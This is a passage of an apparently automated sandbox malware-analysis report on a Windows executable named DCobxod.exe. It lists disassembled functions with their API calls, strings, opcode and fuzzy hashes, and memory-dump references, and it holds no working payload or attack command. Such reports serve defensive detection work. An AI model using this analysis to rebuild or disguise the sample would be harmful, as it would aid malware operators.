                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ItemText$DialogWindow
                                                              • String ID: RENAMEDLG
                                                              • API String ID: 445417207-3299779563
                                                              • Opcode ID: 932f6934eb3add5c247500d35df736ac484a69046ceb3586ee53e9fe25bb02d1
                                                              • Instruction ID: 4cebb55edc0bae66b1bed5574159cbd3d200459d9658ff952e3f119e226bd265
                                                              • Opcode Fuzzy Hash: 932f6934eb3add5c247500d35df736ac484a69046ceb3586ee53e9fe25bb02d1
                                                              • Instruction Fuzzy Hash: 65012833B44224BBD2204F64BD09F57775CFB5AB02F510032F345A21D4C7AA9909977E
                                                              Function 00437E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00437E24,00000000,?,00437DC4,00000000,0044C300,0000000C,00437F1B,00000000,00000002), ref: 00437E93
                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00437EA6
                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00437E24,00000000,?,00437DC4,00000000,0044C300,0000000C,00437F1B,00000000,00000002), ref: 00437EC9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: fc671439f461b8b800270c9b86e2389c4b41936ea2ba17e902214532f6913a39
                                                              • Instruction ID: 5a3dc35f5b5ac1e5d5d1b55c8230020639fd9f1633031849ace54e9d19ad3e9a
                                                              • Opcode Fuzzy Hash: fc671439f461b8b800270c9b86e2389c4b41936ea2ba17e902214532f6913a39
                                                              • Instruction Fuzzy Hash: 7DF04475A04218BBDB119FA1DC09B9EBFB4EF45716F0141BAF805A2250DB749E44CA98
                                                              Function 0041F2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0042081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00420836
                                                                • Part of subcall function 0042081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0041F2D8,Crypt32.dll,00000000,0041F35C,?,?,0041F33E,?,?,?), ref: 00420858
                                                              • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0041F2E4
                                                              • GetProcAddress.KERNEL32(004581C8,CryptUnprotectMemory), ref: 0041F2F4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                              • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                              • API String ID: 2141747552-1753850145
                                                              • Opcode ID: 7708fcf51d0fe1a7f07d9d4fcfc25b3c82f41ea21420c42c85b537a0739e1467
                                                              • Instruction ID: 2505efd9ae43185bac90339b40e1652f2901ed700fb69d4e829d848a5ff43125
                                                              • Opcode Fuzzy Hash: 7708fcf51d0fe1a7f07d9d4fcfc25b3c82f41ea21420c42c85b537a0739e1467
                                                              • Instruction Fuzzy Hash: 0BE026309407019ED720AF38980CB42BAD46F04F09F20882FF0DAA3640C7BCD0808B08
                                                              Function 00432BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AdjustPointer$_abort
                                                              • String ID:
                                                              • API String ID: 2252061734-0
                                                              • Opcode ID: a5bbb7edc08ebda530a36e873cccb185fe955cd4e0afc3ac21c0436950a5ed57
                                                              • Instruction ID: f607b6c2a79bd97915df931a98d503020516fe91dddacfa1f762501dab585d0c
                                                              • Opcode Fuzzy Hash: a5bbb7edc08ebda530a36e873cccb185fe955cd4e0afc3ac21c0436950a5ed57
                                                              • Instruction Fuzzy Hash: 3A512472600212AFDB298F15DA45BABB3A4FF1C710F24612FEC01572A1D7B9ED81D798
                                                              Function 0043BF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetEnvironmentStringsW.KERNEL32 ref: 0043BF39
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0043BF5C
                                                                • Part of subcall function 00438E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0043CA2C,00000000,?,00436CBE,?,00000008,?,004391E0,?,?,?), ref: 00438E38
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0043BF82
                                                              • _free.LIBCMT ref: 0043BF95
                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0043BFA4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                              • String ID:
                                                              • API String ID: 336800556-0
                                                              • Opcode ID: 90f463cf6cab8604ec4f6166d502b80eb417ac43a0510441a3da0c40286330c4
                                                              • Instruction ID: e34c14cb8709b9934b6dd498e248a8fa3ec61507db29c300189e872b6541b48a
                                                              • Opcode Fuzzy Hash: 90f463cf6cab8604ec4f6166d502b80eb417ac43a0510441a3da0c40286330c4
                                                              • Instruction Fuzzy Hash: EE01B5666016117F27211A775C49D7B7A6DDECBF69714212EFA04C2201EF68CD0185F8
                                                              Function 00439869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(?,00451030,00000200,004391AD,0043617E,?,?,?,?,0041D984,?,?,?,00000004,0041D710,?), ref: 0043986E
                                                              • _free.LIBCMT ref: 004398A3
                                                              • _free.LIBCMT ref: 004398CA
                                                              • SetLastError.KERNEL32(00000000,00443A34,00000050,00451030), ref: 004398D7
                                                              • SetLastError.KERNEL32(00000000,00443A34,00000050,00451030), ref: 004398E0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$_free
                                                              • String ID:
                                                              • API String ID: 3170660625-0
                                                              • Opcode ID: 113e4de2a5ba3459a013bd341e05d6ee53ab0440dc1156c3616fc3381e08d508
                                                              • Instruction ID: 0094d9b47d1b54341b69ea2f6e1ef3edfe3f487acba9a55d767d3ac8f408cbaa
                                                              • Opcode Fuzzy Hash: 113e4de2a5ba3459a013bd341e05d6ee53ab0440dc1156c3616fc3381e08d508
                                                              • Instruction Fuzzy Hash: 4901F93A1647016BC31A37266C8591B2539DFDBB79F34213FF50592292EEBCCC02516D
                                                              Function 00420EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004211CF: ResetEvent.KERNEL32(?), ref: 004211E1
                                                                • Part of subcall function 004211CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 004211F5
                                                              • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00420F21
                                                              • CloseHandle.KERNEL32(?,?), ref: 00420F3B
                                                              • DeleteCriticalSection.KERNEL32(?), ref: 00420F54
                                                              • CloseHandle.KERNEL32(?), ref: 00420F60
                                                              • CloseHandle.KERNEL32(?), ref: 00420F6C
                                                                • Part of subcall function 00420FE4: WaitForSingleObject.KERNEL32(?,000000FF,00421206,?), ref: 00420FEA
                                                                • Part of subcall function 00420FE4: GetLastError.KERNEL32(?), ref: 00420FF6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                              • String ID:
                                                              • API String ID: 1868215902-0
                                                              • Opcode ID: 36dfb7441801c3adc6823427078b7faca17f5feb8aebf369784d1f6060bf18cc
                                                              • Instruction ID: ae12b6698bca53349f85c1b42f027b4a02ba5299a243c11f163566f49825cb48
                                                              • Opcode Fuzzy Hash: 36dfb7441801c3adc6823427078b7faca17f5feb8aebf369784d1f6060bf18cc
                                                              • Instruction Fuzzy Hash: 45019276100740EFC7329F64DD85BC6FBE9FB09B11F40092AF25A52160C7B67A44CA58
                                                              Function 0043C7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 0043C817
                                                                • Part of subcall function 00438DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0043C896,00443A34,00000000,00443A34,00000000,?,0043C8BD,00443A34,00000007,00443A34,?,0043CCBA,00443A34), ref: 00438DE2
                                                                • Part of subcall function 00438DCC: GetLastError.KERNEL32(00443A34,?,0043C896,00443A34,00000000,00443A34,00000000,?,0043C8BD,00443A34,00000007,00443A34,?,0043CCBA,00443A34,00443A34), ref: 00438DF4
                                                              • _free.LIBCMT ref: 0043C829
                                                              • _free.LIBCMT ref: 0043C83B
                                                              • _free.LIBCMT ref: 0043C84D
                                                              • _free.LIBCMT ref: 0043C85F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: be99a679324f644c5940a83c11684b421218da1c13bc69a198da2878cf11dc3f
                                                              • Instruction ID: 327de62e3ad8d9e64c51be583f3056764ba49e80cacb9330b43ec35e9c89766b
                                                              • Opcode Fuzzy Hash: be99a679324f644c5940a83c11684b421218da1c13bc69a198da2878cf11dc3f
                                                              • Instruction Fuzzy Hash: 11F0F432504201AB8614FB66E4C5C1773F9BA19B15F64282FF104E7651CB78FD408B5C
                                                              Function 00421FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 00421FE5
                                                              • _wcslen.LIBCMT ref: 00421FF6
                                                              • _wcslen.LIBCMT ref: 00422006
                                                              • _wcslen.LIBCMT ref: 00422014
                                                              • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0041B371,?,?,00000000,?,?,?), ref: 0042202F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$CompareString
                                                              • String ID:
                                                              • API String ID: 3397213944-0
                                                              • Opcode ID: 4b8e5517ff3f2e55f4fe119971a5c8f96c6c32863ee68cc0bcac4c64ac3c86cf
                                                              • Instruction ID: 483c14ea38b3ae2559030c4f640b6997a8a16e41fa0cf0e773cf3fe3ebc7ed3a
                                                              • Opcode Fuzzy Hash: 4b8e5517ff3f2e55f4fe119971a5c8f96c6c32863ee68cc0bcac4c64ac3c86cf
                                                              • Instruction Fuzzy Hash: A8F06D32508024BBCF222F51EC0AD8A3F26EB45765F11801AF62A5B061CB729A61D698
                                                              Function 004215FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _swprintf
                                                              • String ID: %ls$%s: %s
                                                              • API String ID: 589789837-2259941744
                                                              • Opcode ID: f6c95b587cdb6e8524152ce1f12cb24380f79859d7d6a99ace86a4300f1151cd
                                                              • Instruction ID: 5774ac85d26875fb23525f93b01a9f18e94ed5f22b8fe3602dc2e02f67d152c2
                                                              • Opcode Fuzzy Hash: f6c95b587cdb6e8524152ce1f12cb24380f79859d7d6a99ace86a4300f1151cd
                                                              • Instruction Fuzzy Hash: 7E513C35344320F7F6212B91AC82F3A7255AB74B04FE4454BF786640F1CAAF9552A71F
                                                              Function 00437F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\DCobxod.exe,00000104), ref: 00437FAE
                                                              • _free.LIBCMT ref: 00438079
                                                              • _free.LIBCMT ref: 00438083
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _free$FileModuleName
                                                              • String ID: C:\Users\user\Desktop\DCobxod.exe
                                                              • API String ID: 2506810119-3673004843
                                                              • Opcode ID: c2c39dd3dd0a9b520eb72b2b78060aae2fec894a5a30bb075454c10ec3ee0fcb
                                                              • Instruction ID: 9a575ffd5ae3bf5701fea402d8f4bca7b86de3ac27f07e41b3a4879b74fc8c9b
                                                              • Opcode Fuzzy Hash: c2c39dd3dd0a9b520eb72b2b78060aae2fec894a5a30bb075454c10ec3ee0fcb
                                                              • Instruction Fuzzy Hash: 3A31C2B1A00308AFDB25DF95C88099EBBB8EB89314F11506FF50497211DAB48E84CB59
                                                              Function 004331D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 004331FB
                                                              • _abort.LIBCMT ref: 00433306
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: EncodePointer_abort
                                                              • String ID: MOC$RCC
                                                              • API String ID: 948111806-2084237596
                                                              • Opcode ID: d7bd5f19f9171b3a57f6c1997f69ea921caa385913104ccf9dd0bce22f9209e8
                                                              • Instruction ID: 9621055f37a241d954ed42887ec1844083d5c531a516118b08d11369a70ebfe0
                                                              • Opcode Fuzzy Hash: d7bd5f19f9171b3a57f6c1997f69ea921caa385913104ccf9dd0bce22f9209e8
                                                              • Instruction Fuzzy Hash: D6414771900209AFCF15DF98CD81AEEBBB5BF48305F18919AF905A7221D339AA50DB58
                                                              Function 00417401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00417406
                                                                • Part of subcall function 00413BBA: __EH_prolog.LIBCMT ref: 00413BBF
                                                              • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 004174CD
                                                                • Part of subcall function 00417A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00417AAB
                                                                • Part of subcall function 00417A9C: GetLastError.KERNEL32 ref: 00417AF1
                                                                • Part of subcall function 00417A9C: CloseHandle.KERNEL32(?), ref: 00417B00
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                              • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                              • API String ID: 3813983858-639343689
                                                              • Opcode ID: 0fa7c30cd6a871d028229fa41123d1efdee9ceb6a63582693f8bca6214ae2b72
                                                              • Instruction ID: 3c2e26489febaea85bc7fbfdfcaf1fb26b47aacf47e466260319b7a2480e751f
                                                              • Opcode Fuzzy Hash: 0fa7c30cd6a871d028229fa41123d1efdee9ceb6a63582693f8bca6214ae2b72
                                                              • Instruction Fuzzy Hash: B731E371E04258AADF10EFA5DC45BEF7BB9AF08308F00401BF404A7292C77C8AC48768
                                                              Function 0042AD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00411316: GetDlgItem.USER32(00000000,00003021), ref: 0041135A
                                                                • Part of subcall function 00411316: SetWindowTextW.USER32(00000000,004435F4), ref: 00411370
                                                              • EndDialog.USER32(?,00000001), ref: 0042AD98
                                                              • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0042ADAD
                                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 0042ADC2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ItemText$DialogWindow
                                                              • String ID: ASKNEXTVOL
                                                              • API String ID: 445417207-3402441367
                                                              • Opcode ID: 780370a921b99ee7f286203050ebefc326a7af006853e7f3aa114906e6c0445a
                                                              • Instruction ID: 4e1e9cf5e2a7631f6b1434c34bb4e77ebbbeee035d15b24e6126a9c844284907
                                                              • Opcode Fuzzy Hash: 780370a921b99ee7f286203050ebefc326a7af006853e7f3aa114906e6c0445a
                                                              • Instruction Fuzzy Hash: 5C110A32390220BFD7228F98ED05FA7375AEF4A702F800416F644D75B0C7699955972F
                                                              Function 0042DDA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DialogBoxParamW.USER32(GETPASSWORD1,0001041E,0042B270,?,?), ref: 0042DE18
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: DialogParam
                                                              • String ID: GETPASSWORD1$rB$xzF
                                                              • API String ID: 665744214-139477248
